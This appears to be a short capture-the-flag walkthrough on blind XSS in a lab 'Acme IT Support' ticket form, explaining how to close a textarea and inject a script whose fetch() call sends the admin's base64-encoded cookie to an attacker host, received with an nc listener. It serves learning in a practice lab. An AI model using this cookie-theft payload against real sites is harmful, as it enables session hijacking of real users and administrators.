Exploiting Blind XSS
Last updated
Last updated
Create an account
Once our account gets set up, click the Support Tickets tab, which is the feature we will investigate for weaknesses
Create a ticket and view the source to investigate where our text sits in the application
Hmm? well its inside the textarea tag (similar to our previous tasks), So close the textarea tag and then use the script tags to execute an alert - Just to confirm if it reflects !
And yes, it does - Now our end goal is to raise a malicious ticket and get the admin's cookie in return, when viewed by the admin !
The </textarea>
tag closes the textarea field
The <script>
tag opens open an area for us to write JavaScript
The fetch()
command makes an HTTP request
{URL_OR_IP}
is our IP address or the Burp Collab's link
?cookie=
is the query string that will contain the victim's cookies
btoa()
command base64 encodes the victim's cookies
document.cookie
accesses the victim's cookies for the Acme IT Support Website
</script>
closes the JavaScript code block
Start a Listener using nc or start a web server using python and get the victim's cookie is b64 format - then decode it and submit the flag !